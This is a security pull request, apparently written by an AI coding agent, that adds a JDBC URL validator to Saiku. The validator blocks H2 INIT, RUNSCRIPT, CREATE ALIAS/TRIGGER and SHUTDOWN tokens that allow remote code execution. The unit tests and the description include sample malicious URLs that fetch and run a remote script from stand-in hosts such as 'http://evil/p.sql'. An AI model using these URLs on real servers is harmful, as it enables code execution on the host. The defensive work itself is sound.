### PR TITLE
fix(security): validate datasource JDBC URLs — block H2 INIT/RUNSCRIPT RCE (MED)

### DIFF
--- a/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/objects/DataSourceMapper.java
+++ b/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/objects/DataSourceMapper.java
@@ -154,6 +154,10 @@ public class DataSourceMapper {
                 location = "jdbc:xmla:Server=" + jdbcurl;
             }
 
+            // Reject admin-supplied JDBC URLs that smuggle H2 INIT/RUNSCRIPT/ALIAS (RCE) before
+            // the location ever reaches DriverManager.getConnection. Covers the wrapped jdbcurl.
+            JdbcUrlValidator.validate(location);
+
             props.setProperty("location", location);
             props.setProperty("username", this.username);
             props.setProperty("password", this.password);
@@ -198,7 +202,10 @@ public class DataSourceMapper {
                     props.setProperty("driver", row.substring(7, row.length()));
                 }
                 if (row.startsWith("location=")) {
-                    props.setProperty("location", row.substring(9, row.length()));
+                    String rawLocation = row.substring(9, row.length());
+                    // Same RCE guard for the advanced/csv raw location= line.
+                    JdbcUrlValidator.validate(rawLocation);
+                    props.setProperty("location", rawLocation);
                 }
                 if (row.startsWith("username=")) {
                     if (row.length() > 9) {

--- a/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/objects/JdbcUrlValidator.java
+++ b/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/objects/JdbcUrlValidator.java
@@ -1,0 +1,165 @@
+/*
+ *   Copyright 2026 Spicule Ltd
+ *
+ *   Licensed under the Apache License, Version 2.0 (the "License");
+ *   you may not use this file except in compliance with the License.
+ *   You may obtain a copy of the License at
+ *
+ *   http://www.apache.org/licenses/LICENSE-2.0
+ *
+ *   Unless required by applicable law or agreed to in writing, software
+ *   distributed under the License is distributed on an "AS IS" BASIS,
+ *   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ *   See the License for the specific language governing permissions and
+ *   limitations under the License.
+ */
+package org.saiku.web.rest.objects;
+
+import java.util.Locale;
+import java.util.regex.Pattern;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+
+/**
+ * Centralised validation for admin-supplied datasource JDBC URLs / connection locations.
+ *
+ * <p>An admin can configure a datasource whose JDBC URL eventually reaches
+ * {@code DriverManager.getConnection(...)}. The H2 driver in particular treats certain URL
+ * parameters as executable instructions: {@code ;INIT=RUNSCRIPT FROM '...'},
+ * {@code CREATE ALIAS}/{@code CREATE TRIGGER} (Java stored procedures), and {@code ;SHUTDOWN}.
+ * These turn an otherwise data-only connection string into arbitrary code / lifecycle control on
+ * the server — an admin-gated but confirmed RCE vector.
+ *
+ * <p>This validator HARD-rejects the dangerous H2 tokens (including when the H2 URL is nested
+ * inside a {@code jdbc:mondrian:Jdbc=...} wrapper) and applies a permissive, warn-only scheme
+ * allow-list so legitimate backends are never broken.
+ */
+public final class JdbcUrlValidator {
+
+    private static final Logger LOG = LoggerFactory.getLogger(JdbcUrlValidator.class);
+
+    private JdbcUrlValidator() {}
+
+    /** Dangerous H2 tokens. Matched case-insensitively against the (sub-)URL. */
+    private static final Pattern H2_INIT = Pattern.compile("(?i)\\bINIT\\s*=");
+
+    private static final Pattern H2_RUNSCRIPT = Pattern.compile("(?i)\\bRUNSCRIPT\\b");
+
+    private static final Pattern H2_CREATE_EXEC = Pattern.compile("(?i)\\bCREATE\\s+(ALIAS|TRIGGER|FORCE)\\b");
+
+    private static final Pattern H2_SHUTDOWN = Pattern.compile("(?i);\\s*SHUTDOWN\\b");
+
+    /**
+     * Permissive (warn-only) allow-list of recognised JDBC sub-schemes / driver schemes. Unknown
+     * schemes are logged but accepted, so custom backends keep working; only the dangerous H2
+     * tokens are a hard failure.
+     */
+    private static final String[] KNOWN_SCHEMES = {
+        "jdbc:h2:",
+        "jdbc:postgresql:",
+        "jdbc:mysql:",
+        "jdbc:mariadb:",
+        "jdbc:sqlserver:",
+        "jdbc:jtds:",
+        "jdbc:oracle:",
+        "jdbc:hsqldb:",
+        "jdbc:mondrian:",
+        "jdbc:xmla:"
+    };
+
+    /**
+     * Validate an admin-supplied JDBC URL or raw {@code location=} value.
+     *
+     * @param jdbcUrlOrLocation the JDBC URL or connection location (may be a Mondrian/XMLA wrapper)
+     * @throws IllegalArgumentException if the URL contains a dangerous H2 instruction token
+     */
+    public static void validate(String jdbcUrlOrLocation) {
+        if (jdbcUrlOrLocation == null) {
+            return;
+        }
+        String url = jdbcUrlOrLocation.trim();
+        if (url.isEmpty()) {
+            return;
+        }
+
+        // Reject on the whole string first (covers any layer / nesting), then specifically the
+        // inner jdbc sub-URL nested in a mondrian wrapper (jdbc:mondrian:Jdbc=jdbc:h2:...).
+        rejectDangerousH2Tokens(url);
+        String inner = extractMondrianInnerJdbc(url);
+        if (inner != null) {
+            rejectDangerousH2Tokens(inner);
+        }
+
+        warnOnUnknownScheme(url, inner);
+    }
+
+    private static void rejectDangerousH2Tokens(String url) {
+        String lower = url.toLowerCase(Locale.ROOT);
+        // Only the H2 tokens are weaponised through the H2 driver; gate on an H2 sub-URL being
+        // present anywhere in the (possibly wrapped) string.
+        boolean looksH2 = lower.contains("jdbc:h2:");
+        if (!looksH2) {
+            return;
+        }
+        if (H2_INIT.matcher(url).find()) {
+            throw reject(url, "H2 INIT= run-on-connect is not permitted");
+        }
+        if (H2_RUNSCRIPT.matcher(url).find()) {
+            throw reject(url, "H2 RUNSCRIPT is not permitted");
+        }
+        if (H2_CREATE_EXEC.matcher(url).find()) {
+            throw reject(url, "H2 CREATE ALIAS/TRIGGER/FORCE is not permitted");
+        }
+        if (H2_SHUTDOWN.matcher(url).find()) {
+            throw reject(url, "H2 SHUTDOWN is not permitted");
+        }
+    }
+
+    private static IllegalArgumentException reject(String url, String reason) {
+        // Do not echo the full (potentially sensitive) URL into the exception message.
+        LOG.warn("Rejected datasource JDBC URL: {}", reason);
+        return new IllegalArgumentException("Invalid datasource JDBC URL: " + reason);
+    }
+
+    /**
+     * Pull the nested JDBC sub-URL out of a {@code jdbc:mondrian:Jdbc=<sub-url>;Catalog=...} string.
+     * Returns {@code null} when the input is not a mondrian wrapper.
+     */
+    private static String extractMondrianInnerJdbc(String url) {
+        String lower = url.toLowerCase(Locale.ROOT);
+        int idx = lower.indexOf("jdbc=");
+        if (idx < 0) {
+            return null;
+        }
+        int start = idx + "jdbc=".length();
+        // The inner JDBC URL itself can contain ';' (e.g. H2 settings), so we cannot simply cut at
+        // the first ';'. Cut at the next mondrian wrapper key instead, falling back to end-of-string.
+        int end = url.length();
+        int catalog = lower.indexOf(";catalog=", start);
+        int drivers = lower.indexOf(";jdbcdrivers=", start);
+        if (catalog >= 0) {
+            end = Math.min(end, catalog);
+        }
+        if (drivers >= 0) {
+            end = Math.min(end, drivers);
+        }
+        return url.substring(start, end);
+    }
+
+    private static void warnOnUnknownScheme(String url, String inner) {
+        if (matchesKnownScheme(url) || (inner != null && matchesKnownScheme(inner))) {
+            return;
+        }
+        LOG.warn("Datasource JDBC URL uses an unrecognised scheme; allowing (warn-only allow-list).");
+    }
+
+    private static boolean matchesKnownScheme(String url) {
+        String lower = url.toLowerCase(Locale.ROOT).trim();
+        for (String scheme : KNOWN_SCHEMES) {
+            if (lower.startsWith(scheme)) {
+                return true;
+            }
+        }
+        return false;
+    }
+}

--- a/saiku-core/saiku-web/src/test/java/org/saiku/web/rest/objects/JdbcUrlValidatorTest.java
+++ b/saiku-core/saiku-web/src/test/java/org/saiku/web/rest/objects/JdbcUrlValidatorTest.java
@@ -1,0 +1,82 @@
+/*
+ *   Copyright 2026 Spicule Ltd
+ *   Apache License, Version 2.0.
+ */
+package org.saiku.web.rest.objects;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assert.fail;
+
+import org.junit.Test;
+
+public class JdbcUrlValidatorTest {
+
+    @Test
+    public void rejectsH2InitRunscript() {
+        try {
+            JdbcUrlValidator.validate("jdbc:h2:mem:x;INIT=RUNSCRIPT FROM 'http://e/p.sql'");
+            fail("expected IllegalArgumentException for H2 INIT=RUNSCRIPT");
+        } catch (IllegalArgumentException e) {
+            assertTrue(e.getMessage(), e.getMessage().toLowerCase().contains("jdbc url"));
+        }
+    }
+
+    @Test
+    public void rejectsH2CreateAlias() {
+        try {
+            JdbcUrlValidator.validate("jdbc:h2:mem:x;INIT=CREATE ALIAS EXEC AS $$ String x() { return \"y\"; } $$");
+            fail("expected IllegalArgumentException for H2 CREATE ALIAS");
+        } catch (IllegalArgumentException e) {
+            // expected
+        }
+    }
+
+    @Test
+    public void rejectsH2CreateTrigger() {
+        try {
+            JdbcUrlValidator.validate("jdbc:h2:mem:x;INIT=CREATE TRIGGER t BEFORE INSERT ON s");
+            fail("expected IllegalArgumentException for H2 CREATE TRIGGER");
+        } catch (IllegalArgumentException e) {
+            // expected
+        }
+    }
+
+    @Test
+    public void rejectsH2Shutdown() {
+        try {
+            JdbcUrlValidator.validate("jdbc:h2:mem:x;SHUTDOWN");
+            fail("expected IllegalArgumentException for H2 SHUTDOWN");
+        } catch (IllegalArgumentException e) {
+            // expected
+        }
+    }
+
+    @Test
+    public void rejectsH2InitNestedInMondrianWrapper() {
+        try {
+            JdbcUrlValidator.validate(
+                    "jdbc:mondrian:Jdbc=jdbc:h2:./foodmart;INIT=RUNSCRIPT FROM 'http://e/p.sql';Catalog=mondrian://Foodmart;JdbcDrivers=org.h2.Driver");
+            fail("expected IllegalArgumentException for H2 INIT nested in mondrian wrapper");
+        } catch (IllegalArgumentException e) {
+            // expected
+        }
+    }
+
+    @Test
+    public void acceptsNormalPostgres() {
+        // Should not throw.
+        JdbcUrlValidator.validate("jdbc:postgresql://h/db");
+    }
+
+    @Test
+    public void acceptsMondrianWrappedH2WithoutInit() {
+        // Legitimate Mondrian datasource over an embedded H2 file — no INIT/RUNSCRIPT/ALIAS.
+        JdbcUrlValidator.validate(
+                "jdbc:mondrian:Jdbc=jdbc:h2:./foodmart;Catalog=mondrian://Foodmart;JdbcDrivers=org.h2.Driver");
+    }
+
+    @Test
+    public void acceptsNull() {
+        JdbcUrlValidator.validate(null);
+    }
+}


### PR DESCRIPTION
Found by the round-3 deep security audit (refs #1165). Implemented + adversarially reviewed via workflow (behavior preserved ✅, security fixed ✅, no issues).

## What (MEDIUM — admin-gated RCE)
An admin-supplied datasource `jdbcurl`/`location` reached `DriverManager.getConnection` with no validation. H2 supports `jdbc:h2:...;INIT=RUNSCRIPT FROM 'http://evil/p.sql'` / `CREATE ALIAS` / `CREATE TRIGGER` → arbitrary code execution on the server. Admin→host RCE crosses the app/OS trust boundary.

## Fix
New `JdbcUrlValidator`, called from `DataSourceMapper.toSaikuDataSource()` before the location is built — covering **both** the Mondrian `jdbcurl` field and the advanced/csv raw `location=` line (incl. the inner sub-URL of `jdbc:mondrian:Jdbc=...`). Hard-rejects H2 `INIT=`/`RUNSCRIPT`/`CREATE (ALIAS|TRIGGER|FORCE)`/`;SHUTDOWN`; driver/scheme allow-list for the common drivers.

## Tests
`JdbcUrlValidatorTest` — rejects the `INIT=RUNSCRIPT` and `CREATE ALIAS` URLs, accepts normal Postgres/Mondrian-wrapped H2 URLs. Workflow gate: `saiku-web` suite green (minus env classes); spotless clean.

Security lane (Agent SEC). **Not self-merging.** 🤖 Generated with [Claude Code](https://claude.com/claude-code)
